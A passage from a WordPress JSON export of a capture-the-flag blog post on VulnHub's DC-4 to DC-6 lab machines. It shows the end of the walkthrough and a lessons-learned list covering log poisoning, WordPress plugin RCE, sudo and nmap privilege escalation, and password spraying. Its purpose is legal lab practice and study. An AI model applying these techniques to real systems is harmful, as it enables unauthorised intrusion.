password.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"489\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40.png\" alt=\"\" class=\"wp-image-313\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40.png 740w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-40-300x198.png 300w\" sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/figure>\n\n\n\n<p>Using this, we escalated to root and retrieved the flag:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"648\" height=\"294\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41.png\" alt=\"\" class=\"wp-image-314\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41.png 648w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-41-300x136.png 300w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">Lessons Learned<\/h1>\n\n\n\n<p>This trio of challenges reinforced several key pentesting principles and techniques:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Thorough Enumeration is Crucial:<\/strong> Each machine required a methodical approach to scanning and enumeration. From using full port scans and service detection in DC-5 and DC-6 to digging into HTTP services and forms in DC-4, uncovering every potential attack vector depends heavily on detailed reconnaissance.<\/li>\n\n\n\n<li><strong>Don\u2019t Underestimate Simple Vulnerabilities:<\/strong> DC-4\u2019s log poisoning and DC-6\u2019s vulnerable WordPress plugin highlight that even well-known, \u201cold-school\u201d vulnerabilities like log injection or authenticated RCE can be just as effective as more complex exploits\u2014especially when chained together.<\/li>\n\n\n\n<li><strong>Privilege Escalation Creativity:<\/strong> DC-4 and DC-6 demonstrated different privilege escalation paths, from misconfigured sudo permissions to leveraging nmap\u2019s root execution capability. These remind us that understanding the underlying system and installed software is as important as finding the initial foothold.<\/li>\n\n\n\n<li><strong>Persistence &amp; Adaptability:<\/strong> The struggle to get a stable shell in DC-5 was a good lesson in patience and flexibility. Sometimes exploits or payloads fail intermittently, so testing multiple methods and adapting is essential.<\/li>\n\n\n\n<li><strong>User Enumeration &amp; Password Spraying:<\/strong> DC-6 emphasized the power of username enumeration combined with password spraying to gain access. This remains a fundamental technique for breaking into web apps and CMS platforms like WordPress.<\/li>\n\n\n\n<li><strong>Always Check for Post-Exploitation Opportunities:<\/strong> Once inside, examining files like <code>things-to-do.txt<\/code> or running commands like <code>sudo -l<\/code> can reveal unexpected privilege escalation routes or useful insights, turning a limited shell into a full compromise.<\/li>\n<\/ol>\n\n\n\n<p>Overall, these challenges reinforced that a successful pentest isn\u2019t just about flashy exploits but about persistence, creativity, and attention to detail at every stage.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As part of my CEH Practical prep, I\u2019m sharpening my enumeration and exploitation workflow using realistic boot2root machines. The DC series on VulnHub is perfect for this: local, legal, and logically progressive. In this post, I\u2019ll walk through DC-4, DC-5, DC-6 \u2014 there are more web-focused VMs in the series. DC-4 Enumeration Let\u2019s start with [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[31,29,30,32],"class_list":["post-292","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-enumeration","tag-hydra","tag-nmap","tag-vulnhub"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=292"}],"version-history":[{"count":8,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}